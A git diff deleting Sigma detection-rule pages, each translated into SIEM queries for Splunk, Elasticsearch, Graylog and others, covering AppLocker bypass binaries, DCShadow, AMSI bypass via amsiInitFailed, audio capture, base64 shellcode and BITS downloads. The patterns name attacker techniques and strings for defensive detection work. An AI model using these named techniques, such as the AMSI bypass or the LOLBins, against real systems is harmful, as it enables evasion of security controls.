-        CommandLine|contains:
-            - '\msdt.exe'
-            - '\installutil.exe'
-            - '\regsvcs.exe'
-            - '\regasm.exe'
-            # - '\regsvr32.exe'  # too many FPs, very noisy
-            - '\msbuild.exe'
-            - '\ieexec.exe'
-            #- '\mshta.exe'
-            #- '\csc.exe'
-    condition: selection
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-    - Using installutil to add features for .NET applications (primarly would occur in developer environments)
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*\\msdt.exe.*" -or $_.message -match "CommandLine.*.*\\installutil.exe.*" -or $_.message -match "CommandLine.*.*\\regsvcs.exe.*" -or $_.message -match "CommandLine.*.*\\regasm.exe.*" -or $_.message -match "CommandLine.*.*\\msbuild.exe.*" -or $_.message -match "CommandLine.*.*\\ieexec.exe.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\\msdt.exe* OR *\\installutil.exe* OR *\\regsvcs.exe* OR *\\regasm.exe* OR *\\msbuild.exe* OR *\\ieexec.exe*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719 <<EOF
-{
-  "metadata": {
-    "title": "Possible Applocker Bypass",
-    "description": "Detects execution of executables that can be used to bypass Applocker whitelisting",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1118",
-      "attack.t1121",
-      "attack.t1127",
-      "attack.t1170",
-      "attack.t1218"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\\\msdt.exe* OR *\\\\installutil.exe* OR *\\\\regsvcs.exe* OR *\\\\regasm.exe* OR *\\\\msbuild.exe* OR *\\\\ieexec.exe*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\\\msdt.exe* OR *\\\\installutil.exe* OR *\\\\regsvcs.exe* OR *\\\\regasm.exe* OR *\\\\msbuild.exe* OR *\\\\ieexec.exe*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible Applocker Bypass'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\\msdt.exe* *\\installutil.exe* *\\regsvcs.exe* *\\regasm.exe* *\\msbuild.exe* *\\ieexec.exe*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\msdt.exe*" OR CommandLine="*\\installutil.exe*" OR CommandLine="*\\regsvcs.exe*" OR CommandLine="*\\regasm.exe*" OR CommandLine="*\\msbuild.exe*" OR CommandLine="*\\ieexec.exe*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*\\msdt.exe*", "*\\installutil.exe*", "*\\regsvcs.exe*", "*\\regasm.exe*", "*\\msbuild.exe*", "*\\ieexec.exe*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\msdt\.exe.*|.*.*\installutil\.exe.*|.*.*\regsvcs\.exe.*|.*.*\regasm\.exe.*|.*.*\msbuild\.exe.*|.*.*\ieexec\.exe.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_possible_dc_shadow.md b/Atomic_Threat_Coverage/Detection_Rules/win_possible_dc_shadow.md
deleted file mode 100644
index cb8d6e3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_possible_dc_shadow.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Possible DC Shadow       |
-|:-------------------------|:------------------|
-| **Description**          | Detects DC sync via create new SPN |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1207: Rogue Domain Controller](https://attack.mitre.org/techniques/T1207)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1207: Rogue Domain Controller](../Triggers/T1207.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Exclude known DCs</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml](https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml)</li><li>[https://twitter.com/gentilkiwi/status/1003236624925413376](https://twitter.com/gentilkiwi/status/1003236624925413376)</li><li>[https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2](https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2)</li><li>[https://blog.alsid.eu/dcshadow-explained-4510f52fc19d](https://blog.alsid.eu/dcshadow-explained-4510f52fc19d)</li></ul>  |
-| **Author**               | Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible DC Shadow
-id: 32e19d25-4aed-4860-a55a-be99cb0bf7ed
-description: Detects DC sync via create new SPN
-status: experimental
-author: Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah
-date: 2019/10/25
-references:
-    - https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml
-    - https://twitter.com/gentilkiwi/status/1003236624925413376
-    - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2
-    - https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
-tags:
-    - attack.credential_access
-    - attack.t1207
-logsource:
-    product: windows
-    service: security
-detection:
-    selection1:
-        EventID: 4742
-        ServicePrincipalNames: '*GC/*'
-    selection2:
-        EventID: 5136
-        LDAPDisplayName: servicePrincipalName
-        Value: 'GC/*'
-    condition: selection1 OR selection2
-falsepositives:
-    - Exclude known DCs
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {((($_.ID -eq "4742" -and $_.message -match "ServicePrincipalNames.*.*GC/.*") -or ($_.ID -eq "5136" -and $_.message -match "LDAPDisplayName.*servicePrincipalName" -and $_.message -match "Value.*GC/.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND ((winlog.event_id:"4742" AND ServicePrincipalNames.keyword:*GC\/*) OR (winlog.event_id:"5136" AND LDAPDisplayName:"servicePrincipalName" AND Value.keyword:GC\/*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/32e19d25-4aed-4860-a55a-be99cb0bf7ed <<EOF
-{
-  "metadata": {
-    "title": "Possible DC Shadow",
-    "description": "Detects DC sync via create new SPN",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1207"
-    ],
-    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:\"4742\" AND ServicePrincipalNames.keyword:*GC\\/*) OR (winlog.event_id:\"5136\" AND LDAPDisplayName:\"servicePrincipalName\" AND Value.keyword:GC\\/*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:\"4742\" AND ServicePrincipalNames.keyword:*GC\\/*) OR (winlog.event_id:\"5136\" AND LDAPDisplayName:\"servicePrincipalName\" AND Value.keyword:GC\\/*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible DC Shadow'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4742" AND ServicePrincipalNames.keyword:*GC\/*) OR (EventID:"5136" AND LDAPDisplayName:"servicePrincipalName" AND Value.keyword:GC\/*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" ((EventCode="4742" ServicePrincipalNames="*GC/*") OR (EventCode="5136" LDAPDisplayName="servicePrincipalName" Value="GC/*")))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" ((event_id="4742" ServicePrincipalNames="*GC/*") OR (event_id="5136" LDAPDisplayName="servicePrincipalName" Value="GC/*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*4742)(?=.*.*GC/.*))|.*(?:.*(?=.*5136)(?=.*servicePrincipalName)(?=.*GC/.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_amsi_bypass.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_amsi_bypass.md
deleted file mode 100644
index d2f4369..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_amsi_bypass.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Powershell AMSI Bypass via .NET Reflection       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Request to amsiInitFailed that can be used to disable AMSI Scanning |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Potential Admin Activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/mattifestation/status/735261176745988096](https://twitter.com/mattifestation/status/735261176745988096)</li><li>[https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120](https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120)</li></ul>  |
-| **Author**               | Markus Neis |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Powershell AMSI Bypass via .NET Reflection
-id: 30edb182-aa75-42c0-b0a9-e998bb29067c
-status: experimental
-description: Detects Request to amsiInitFailed that can be used to disable AMSI Scanning
-references:
-    - https://twitter.com/mattifestation/status/735261176745988096
-    - https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120
-tags:
-    - attack.execution
-    - attack.defense_evasion
-    - attack.t1086
-    - attack.t1059.001
-author: Markus Neis
-date: 2018/08/17
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine:
-            - '*System.Management.Automation.AmsiUtils*'
-    selection2:
-        CommandLine:
-            - '*amsiInitFailed*'
-    condition: selection1 and selection2
-falsepositives:
-    - Potential Admin Activity
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*System.Management.Automation.AmsiUtils.*") -and ($_.message -match "CommandLine.*.*amsiInitFailed.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*System.Management.Automation.AmsiUtils*) AND winlog.event_data.CommandLine.keyword:(*amsiInitFailed*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/30edb182-aa75-42c0-b0a9-e998bb29067c <<EOF
-{
-  "metadata": {
-    "title": "Powershell AMSI Bypass via .NET Reflection",
-    "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning",
-    "tags": [
-      "attack.execution",
-      "attack.defense_evasion",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*System.Management.Automation.AmsiUtils*) AND winlog.event_data.CommandLine.keyword:(*amsiInitFailed*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*System.Management.Automation.AmsiUtils*) AND winlog.event_data.CommandLine.keyword:(*amsiInitFailed*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Powershell AMSI Bypass via .NET Reflection'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(*System.Management.Automation.AmsiUtils*) AND CommandLine.keyword:(*amsiInitFailed*))
-```
-
-
-### splunk
-    
-```
-((CommandLine="*System.Management.Automation.AmsiUtils*") (CommandLine="*amsiInitFailed*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*System.Management.Automation.AmsiUtils*"] CommandLine IN ["*amsiInitFailed*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*System\.Management\.Automation\.AmsiUtils.*))(?=.*(?:.*.*amsiInitFailed.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_audio_capture.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_audio_capture.md
deleted file mode 100644
index adb080a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_audio_capture.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Audio Capture via PowerShell       |
-|:-------------------------|:------------------|
-| **Description**          | Detects audio capture via PowerShell Cmdlet |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0009: Collection](https://attack.mitre.org/tactics/TA0009)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1123: Audio Capture](https://attack.mitre.org/techniques/T1123)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1123: Audio Capture](../Triggers/T1123.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate audio capture by legitimate user</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.yaml)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html](https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Audio Capture via PowerShell
-id: 932fb0d8-692b-4b0f-a26e-5643a50fe7d6
-description: Detects audio capture via PowerShell Cmdlet
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community
-date: 2019/10/24
-modified: 2019/11/11
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.yaml
-    - https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html
-tags:
-    - attack.collection
-    - attack.t1123
-detection:
-    selection:
-        CommandLine|contains: 'WindowsAudioDevice-Powershell-Cmdlet'
-    condition: selection
-falsepositives:
-    - Legitimate audio capture by legitimate user
-level: medium
-logsource:
-    category: process_creation
-    product: windows
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*WindowsAudioDevice-Powershell-Cmdlet.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*WindowsAudioDevice\-Powershell\-Cmdlet*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/932fb0d8-692b-4b0f-a26e-5643a50fe7d6 <<EOF
-{
-  "metadata": {
-    "title": "Audio Capture via PowerShell",
-    "description": "Detects audio capture via PowerShell Cmdlet",
-    "tags": [
-      "attack.collection",
-      "attack.t1123"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*WindowsAudioDevice\\-Powershell\\-Cmdlet*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*WindowsAudioDevice\\-Powershell\\-Cmdlet*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Audio Capture via PowerShell'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*WindowsAudioDevice\-Powershell\-Cmdlet*
-```
-
-
-### splunk
-    
-```
-CommandLine="*WindowsAudioDevice-Powershell-Cmdlet*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*WindowsAudioDevice-Powershell-Cmdlet*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*WindowsAudioDevice-Powershell-Cmdlet.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_b64_shellcode.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_b64_shellcode.md
deleted file mode 100644
index d38005d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_b64_shellcode.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | PowerShell Base64 Encoded Shellcode       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Base64 encoded Shellcode |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/cyb3rops/status/1063072865992523776](https://twitter.com/cyb3rops/status/1063072865992523776)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell Base64 Encoded Shellcode
-id: 2d117e49-e626-4c7c-bd1f-c3c0147774c8
-description: Detects Base64 encoded Shellcode
-status: experimental
-references:
-    - https://twitter.com/cyb3rops/status/1063072865992523776
-author: Florian Roth
-date: 2018/11/17
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine: '*AAAAYInlM*'
-    selection2:
-        CommandLine:
-            - '*OiCAAAAYInlM*'
-            - '*OiJAAAAYInlM*'
-    condition: selection1 and selection2
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*AAAAYInlM.*" -and ($_.message -match "CommandLine.*.*OiCAAAAYInlM.*" -or $_.message -match "CommandLine.*.*OiJAAAAYInlM.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*AAAAYInlM* AND winlog.event_data.CommandLine.keyword:(*OiCAAAAYInlM* OR *OiJAAAAYInlM*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2d117e49-e626-4c7c-bd1f-c3c0147774c8 <<EOF
-{
-  "metadata": {
-    "title": "PowerShell Base64 Encoded Shellcode",
-    "description": "Detects Base64 encoded Shellcode",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*AAAAYInlM* AND winlog.event_data.CommandLine.keyword:(*OiCAAAAYInlM* OR *OiJAAAAYInlM*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*AAAAYInlM* AND winlog.event_data.CommandLine.keyword:(*OiCAAAAYInlM* OR *OiJAAAAYInlM*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell Base64 Encoded Shellcode'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*AAAAYInlM* AND CommandLine.keyword:(*OiCAAAAYInlM* *OiJAAAAYInlM*))
-```
-
-
-### splunk
-    
-```
-(CommandLine="*AAAAYInlM*" (CommandLine="*OiCAAAAYInlM*" OR CommandLine="*OiJAAAAYInlM*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*AAAAYInlM*" CommandLine IN ["*OiCAAAAYInlM*", "*OiJAAAAYInlM*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*AAAAYInlM.*)(?=.*(?:.*.*OiCAAAAYInlM.*|.*.*OiJAAAAYInlM.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_bitsjob.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_bitsjob.md
deleted file mode 100644
index 847b2b1..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_bitsjob.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Suspicious Bitsadmin Job via PowerShell       |
-|:-------------------------|:------------------|
-| **Description**          | Detect download by BITS jobs via PowerShell |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1197: BITS Jobs](https://attack.mitre.org/techniques/T1197)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1197: BITS Jobs](../Triggers/T1197.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html](https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md)</li></ul>  |
-| **Author**               | Endgame, JHasenbusch (ported to sigma for oscd.community) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Bitsadmin Job via PowerShell
-id: f67dbfce-93bc-440d-86ad-a95ae8858c90
-status: experimental
-description: Detect download by BITS jobs via PowerShell
-references:
-    - https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md
-author: Endgame, JHasenbusch (ported to sigma for oscd.community)
-date: 2018/10/30
-modified: 2019/11/11
-tags:
-    - attack.defense_evasion
-    - attack.persistence
-    - attack.t1197
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\powershell.exe'
-        CommandLine|contains: 'Start-BitsTransfer'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\powershell.exe" -and $_.message -match "CommandLine.*.*Start-BitsTransfer.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\powershell.exe AND winlog.event_data.CommandLine.keyword:*Start\-BitsTransfer*)
-```
-
-
-### xpack-watcher
-    
-```
